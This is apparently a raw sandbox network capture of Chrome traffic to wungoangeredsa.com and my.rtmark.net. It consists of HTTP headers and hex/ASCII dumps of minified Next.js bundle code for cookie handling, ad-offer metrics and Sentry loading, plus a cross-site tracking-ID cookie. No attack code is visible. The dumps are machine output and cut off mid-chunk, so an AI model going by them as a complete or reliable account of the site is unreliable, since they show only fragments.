                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 61 64 64 42 61 73 65 50 61 74 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 30 3b 72 65 74 75 72 6e 20 61 2e 6e 6f 72 6d 61 6c 69 7a 65 50 61 74 68 54 72 61 69 6c 69 6e 67 53 6c 61 73 68 28 6e 2e 61 64 64 50 61 74 68 50 72 65 66 69 78 28 65 2c 22 22 29 29 7d 3b 76 61 72 20 6e 3d 72 28 31 31 30 37 37 29 2c 61 3d 72 28 36 30 35 38 33 29 3b 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 26 26 6e 75 6c 6c 21 3d 3d 74 2e 64 65 66 61 75 6c 74 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61
                                                                                                          Data Ascii: erty(t,"__esModule",{value:!0}),t.addBasePath=function(e,t){0;return a.normalizePathTrailingSlash(n.addPathPrefix(e,""))};var n=r(11077),a=r(60583);("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&"undefined"===typeof t.defa
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 65 66 61 75 6c 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 29 7d 2c 37 34 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 68 61 73 42 61 73 65 50 61 74 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 70 61 74 68 48 61 73 50 72 65 66 69 78 28 65 2c 22 22 29 7d 3b 76 61 72 20 6e 3d 72 28 32 30 38 33 32 29 3b 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 26 26 6e 75 6c 6c 21 3d 3d 74
                                                                                                          Data Ascii: efault,t),e.exports=t.default)},7446:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.hasBasePath=function(e){return n.pathHasPrefix(e,"")};var n=r(20832);("function"===typeof t.default||"object"===typeof t.default&&null!==t
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 7c 6e 75 6c 6c 29 7b 76 61 72 20 6c 3b 28 6e 75 6c 6c 3d 3d 73 7c 7c 6e 75 6c 6c 3d 3d 28 6c 3d 73 2e 74 61 67 4e 61 6d 65 29 3f 76 6f 69 64 20 30 3a 6c 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3d 3d 3d 65 26 26 75 2e 70 75 73 68 28 73 29 7d 76 61 72 20 66 3d 74 2e 6d 61 70 28 6f 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 72 3d 75 2e 6c 65 6e 67 74 68 3b 74 3c 72 3b 74 2b 2b 29 7b 69 66 28 69 28 75 5b 74 5d 2c 65 29 29 72 65 74 75 72 6e 20 75 2e 73 70 6c 69 63 65 28 74 2c 31 29 2c 21 31 7d 72 65 74 75 72 6e 21 30 7d 29 29 3b 75 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 28 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65
                                                                                                          Data Ascii: |null){var l;(null==s||null==(l=s.tagName)?void 0:l.toLowerCase())===e&&u.push(s)}var f=t.map(o).filter((function(e){for(var t=0,r=u.length;t<r;t++){if(i(u[t],e))return u.splice(t,1),!1}return!0}));u.forEach((function(e){var t;return null==(t=e.parentNode


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          47192.168.2.450092104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/4f5ddda985b24b74-1736072686539-595e9d9ff8fe596a.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-aa4d"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4164abb732e4-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC873INData Raw: 37 64 63 31 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 32 38 38 38 5d 2c 7b 31 33 34 32 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 70 61 72 73 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 72 67 75 6d 65 6e 74 20 73 74 72 20 6d 75 73 74 20 62 65 20 61 20 73 74 72 69 6e 67 22 29 3b 76 61 72 20 74 3d 7b 7d 2c 6e 3d 28 72 7c 7c 7b 7d 29 2e 64 65 63 6f 64 65 7c 7c 6f 2c 69 3d 30 3b 66 6f 72 28 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 29 7b 76 61
                                                                                                          Data Ascii: 7dc1(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[92888],{13421:function(e,r){"use strict";r.parse=function(e,r){if("string"!==typeof e)throw new TypeError("argument str must be a string");var t={},n=(r||{}).decode||o,i=0;for(;i<e.length;){va
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 6d 61 78 41 67 65 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d 22 3b 20 4d 61 78 2d 41 67 65 3d 22 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 6c 29 7d 69 66 28 61 2e 64 6f 6d 61 69 6e 29 7b 69 66 28 21 6e 2e 74 65 73 74 28 61 2e 64 6f 6d 61 69 6e 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 64 6f 6d 61 69 6e 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d 22 3b 20 44 6f 6d 61 69 6e 3d 22 2b 61 2e 64 6f 6d 61 69 6e 7d 69 66 28 61 2e 70 61 74 68 29 7b 69 66 28 21 6e 2e 74 65 73 74 28 61 2e 70 61 74 68 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 70 61 74 68 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d
                                                                                                          Data Ascii: w TypeError("option maxAge is invalid");c+="; Max-Age="+Math.floor(l)}if(a.domain){if(!n.test(a.domain))throw new TypeError("option domain is invalid");c+="; Domain="+a.domain}if(a.path){if(!n.test(a.path))throw new TypeError("option path is invalid");c+=
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 65 7d 7d 7d 2c 33 35 31 39 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 72 2c 74 3d 31 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 3c 6e 3b 74 2b 2b 29 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6f 29 26 26 28 65 5b 6f 5d 3d 72 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 6e 2e 61 70 70 6c 79
                                                                                                          Data Ascii: e}}},35196:function(e,r,t){"use strict";var n=this&&this.__assign||function(){return n=Object.assign||function(e){for(var r,t=1,n=arguments.length;t<n;t++)for(var o in r=arguments[t])Object.prototype.hasOwnProperty.call(r,o)&&(e[o]=r[o]);return e},n.apply
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 63 68 28 72 29 7b 72 65 74 75 72 6e 20 65 7d 7d 3b 72 2e 67 65 74 43 6f 6f 6b 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 75 28 65 29 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 72 65 71 29 72 65 74 75 72 6e 20 63 28 65 2e 72 65 71 2e 63 6f 6f 6b 69 65 73 29 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6f 6b 69 65 73 29 72 65 74 75 72 6e 20 63 28 65 2e 63 6f 6f 6b 69 65 73 28 29 29 7d 76 61 72 20 72 3b 69 66 28 65 26 26 28 72 3d 65 2e 72 65 71 29 2c 21 61 28 29 29 72 65 74 75 72 6e 20 72 26 26 72 2e 63 6f 6f 6b 69 65 73 3f 72 2e 63 6f 6f 6b 69 65 73 3a 72 26 26 72 2e 68 65 61 64 65 72 73 2e 63 6f 6f 6b 69 65 3f 28 30 2c
                                                                                                          Data Ascii: ch(r){return e}};r.getCookies=function(e){if(u(e)){if(null===e||void 0===e?void 0:e.req)return c(e.req.cookies);if(null===e||void 0===e?void 0:e.cookies)return c(e.cookies())}var r;if(e&&(r=e.req),!a())return r&&r.cookies?r.cookies:r&&r.headers.cookie?(0,
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6d 61 78 41 67 65 3a 2d 31 7d 29 29 7d 3b 72 2e 68 61 73 43 6f 6f 6b 69 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 65 26 26 28 30 2c 72 2e 67 65 74 43 6f 6f 6b 69 65 73 29 28 74 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 7d 7d 2c 38 36 35 37 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 5f 61 70 70 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 36 37 30 34 35 29 7d 5d 29 7d 2c 36 37 30 34 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 72 29 2c 74 2e 64 28 72 2c 7b 64 65 66 61 75 6c 74 3a 66 75
                                                                                                          Data Ascii: maxAge:-1}))};r.hasCookie=function(e,t){return!!e&&(0,r.getCookies)(t).hasOwnProperty(e)}},86570:function(e,r,t){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_app",function(){return t(67045)}])},67045:function(e,r,t){"use strict";t.r(r),t.d(r,{default:fu
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 75 63 74 6f 72 3b 74 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6e 2c 61 72 67 75 6d 65 6e 74 73 2c 6f 29 7d 65 6c 73 65 20 74 3d 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 6c 28 74 68 69 73 2c 74 29 7d 7d 76 61 72 20 76 3d 74 28 31 32 31 33 39 29 2c 66 3d 74 28 32 39 35 30 35 29 2c 6d 3d 74 28 31 38 33 39 34 29 2c 70 3d 74 28 31 37 39 36 39 29 2c 67 3d 74 28 33 30 31 37 38 29 2c 68 3d 74 28 35 32 39 32 39 29 2c 5f 3d 74 28 39 37 38 39 37 29 2c 62 3d 74 28 37 32 31 38 31 29 2c 79 3d 74 28 35 33 34 34 34 29 2c 50 3d 74 28 32 39 37 35 34 29 2c 77 3d 74 28 33 33 33 39 30 29 2c 53 3d 74 28 39 38 30 38 29 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 28 74 2c 65 29 3b 76 61 72 20 72 3d 64 28 74
                                                                                                          Data Ascii: uctor;t=Reflect.construct(n,arguments,o)}else t=n.apply(this,arguments);return l(this,t)}}var v=t(12139),f=t(29505),m=t(18394),p=t(17969),g=t(30178),h=t(52929),_=t(97897),b=t(72181),y=t(53444),P=t(29754),w=t(33390),S=t(9808),K=function(e){s(t,e);var r=d(t
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 74 2c 6e 2c 6f 2c 69 3d 65 2e 7a 6f 6e 65 2c 61 3d 65 2e 6f 61 69 64 2c 73 3d 74 68 69 73 2e 73 74 61 74 65 2e 6d 65 74 72 69 63 73 43 61 63 68 65 2c 75 3d 28 30 2c 77 2e 44 29 28 7b 65 76 65 6e 74 3a 5f 2e 5f 2e 45 52 52 4f 52 2c 73 75 62 49 64 3a 6e 75 6c 6c 21 3d 3d 28 72 3d 79 2e 6e 2e 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 22 22 2c 65 78 69 74 5a 6f 6e 65 49 64 3a 69 2c 6f 61 69 64 3a 6e 75 6c 6c 21 3d 3d 61 26 26 76 6f 69 64 20 30 21 3d 3d 61 3f 61 3a 79 2e 6e 2e 6f 61 69 64 2c 63 6f 6e 66 69 67 49 64 3a 6e 75 6c 6c 21 3d 3d 28 74 3d 28 30 2c 6d 2e 63 29 28 6c 61 6e 64 44 61 74 61 29 2e 69 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 2c 61 70 70 4e 61 6d 65 3a 6e 75 6c 6c 21
                                                                                                          Data Ascii: ction(e){var r,t,n,o,i=e.zone,a=e.oaid,s=this.state.metricsCache,u=(0,w.D)({event:_._.ERROR,subId:null!==(r=y.n.s)&&void 0!==r?r:"",exitZoneId:i,oaid:null!==a&&void 0!==a?a:y.n.oaid,configId:null!==(t=(0,m.c)(landData).id)&&void 0!==t?t:null,appName:null!
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 75 72 6c 3a 69 2c 64 61 74 61 3a 65 7d 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4d 65 74 72 69 63 73 20 73 79 6e 63 20 66 61 69 6c 65 64 3a 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 29 29 7d 29 2c 31 30 30 29 7d 29 29 7d 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 74 3d 65 2e 65 76 65 6e 74 2c 6f 3d 65 2e 65 78 69 74 5a 6f 6e 65 49 64 2c 61 3d 65 2e 61 75 64 69 65 6e 63 65 2c 73 3d 65 2e 74 65 65 6e 61 67 65 2c 64 3d 65 2e 73 75 72 76 65 79 2c 76 3d 65 2e 61 70 70 4e 61 6d 65 2c 66 3d 65 2e 73 75 62 49 64 2c 6d 3d 65 2e 6f 61 69 64 2c 70 3d 65 2e 6c 61 6e 64 69 6e 67 4e 61 6d 65 2c 67 3d 65 2e 63 6f 6e 66 69 67 49 64 2c 68 3d 75 2e 6e 2e 6f 66 66 65 72 5f 69 64 2e 6c 65
                                                                                                          Data Ascii: url:i,data:e}).catch((function(){console.error("Metrics sync failed: ".concat(e))}))}),100)}))}},f=function(e){var r,t=e.event,o=e.exitZoneId,a=e.audience,s=e.teenage,d=e.survey,v=e.appName,f=e.subId,m=e.oaid,p=e.landingName,g=e.configId,h=u.n.offer_id.le
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6f 77 2e 53 65 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2e 63 61 70 74 75 72 65 45 78 63 65 70 74 69 6f 6e 28 74 29 29 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 6e 74 72 79 4f 6e 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 28 29 7d 7d 29 2c 5b 5d 29 2c 28 30 2c 6e 2e 74 5a 29 28 69 28 29 2c 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 62 72 6f 77 73 65 72 2e 73 65 6e 74 72 79 2d 63 64 6e 2e 63 6f 6d 2f 37 2e 31 30 38 2e 30 2f 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 69 6e 74 65 67 72 69 74 79 3a 22 73 68 61 33 38 34 2d 2f 34 4c 31 39 4a 49 62 33 76 36 61 72 7a 77 68 37 48 41 69
                                                                                                          Data Ascii: ow.Sentry)||void 0===r||r.captureException(t))},c=function(){return(0,a.useEffect)((function(){window.sentryOnLoad=function(){return u()}}),[]),(0,n.tZ)(i(),{src:"https://browser.sentry-cdn.com/7.108.0/bundle.min.js",integrity:"sha384-/4L19JIb3v6arzwh7HAi
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 63 6f 67 6e 69 74 6f 3d 22 73 65 74 49 73 49 6e 63 6f 67 6e 69 74 6f 22 7d 28 6e 7c 7c 28 6e 3d 7b 7d 29 29 7d 2c 31 39 34 39 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 72 2c 7b 69 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 62 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 35 36 37 35 33 29 2c 6f 3d 74 28 31 32 31 33 39 29 2c 69 3d 74 28 37 30 38 36 35 29 2c 61 3d 74 28 39 36 36 37 30 29 2c 73 3d 74 28 35 30 39 33 30 29 2c 75 3d 74 28 39 35 37 39 38 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 73 77 69 74 63 68 28 72 2e 74 79 70 65 29 7b 63 61 73 65 20 75 2e 4b 2e 73 65 74 41 64 65 78 3a 76 61 72 20 74 3d 72
                                                                                                          Data Ascii: cognito="setIsIncognito"}(n||(n={}))},19495:function(e,r,t){"use strict";t.d(r,{iz:function(){return f},bp:function(){return v}});var n=t(56753),o=t(12139),i=t(70865),a=t(96670),s=t(50930),u=t(95798),c=function(e,r){switch(r.type){case u.K.setAdex:var t=r


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          48192.168.2.450071188.114.97.34438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC555OUTGET /gid.js?userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb HTTP/1.1
                                                                                                          Host: my.rtmark.net
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Origin: https://wungoangeredsa.com
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC1333INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Content-Length: 65
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: https://wungoangeredsa.com
                                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding, Authorization,X-CSRF-Token
                                                                                                          access-control-expose-headers: Authorization
                                                                                                          access-control-allow-credentials: true
                                                                                                          timing-allow-origin: *
                                                                                                          timing-allow-origin: *
                                                                                                          Set-Cookie: ID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; expires=Tue, 06 Jan 2026 11:09:22 GMT; secure; SameSite=None
                                                                                                          strict-transport-security: max-age=1
                                                                                                          x-content-type-options: nosniff
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUG%2BQXKy9kGBhCx2mcx3Oii9kZTuOFXX5M1veX0%2BtxaF7VKmcU1PksX6894QSOo8PyQQ6TaHfkh4LinAoGx5Rlozj1%2B%2FDO60QOSJ2Fbl8qvREiyb0JfKxcswL5SGCM8k"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41655fc8439d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1564&rtt_var=599&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1133&delivery_rate=1806930&cwnd=200&unsent_bytes=0&cid=a1840a2622f1e117&ts=1508&x=0"
                                                                                                          2025-01-06 11:09:22 UTC36INData Raw: 7b 22 67 69 64 22 3a 22 31 7a 79 32 38 30 35 30 6b 6f 76 62 66 79 79 63 34 79 7a 34 67 73 71 36 32 70 6b 6d
                                                                                                          Data Ascii: {"gid":"1zy28050kovbfyyc4yz4gsq62pkm
                                                                                                          2025-01-06 11:09:22 UTC29INData Raw: 61 78 68 62 22 2c 22 73 6b 69 70 53 75 62 73 63 72 69 62 65 22 3a 66 61 6c 73 65 7d 0a
                                                                                                          Data Ascii: axhb","skipSubscribe":false}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          49192.168.2.450094104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC412OUTGET /_next/static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-2a00"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4167697e1861-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC873INData Raw: 32 61 30 30 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 36 39 30 31 5d 2c 7b 35 36 36 32 39 3a 66 75 6e 63 74 69 6f 6e 28 5f 5f 75 6e 75 73 65 64 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 5f 5f 61 77 61 69 74 65 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 77 61 69 74 65 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 6e 7c 7c 28 6e 3d 50 72 6f 6d 69 73 65 29 29 28 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 61 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 74 72 79 7b 73 28 72 2e 6e 65 78 74 28
                                                                                                          Data Ascii: 2a00(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[56901],{56629:function(__unused_webpack_module,exports){"use strict";var __awaiter=this&&this.__awaiter||function(e,t,n,r){return new(n||(n=Promise))((function(o,a){function i(e){try{s(r.next(
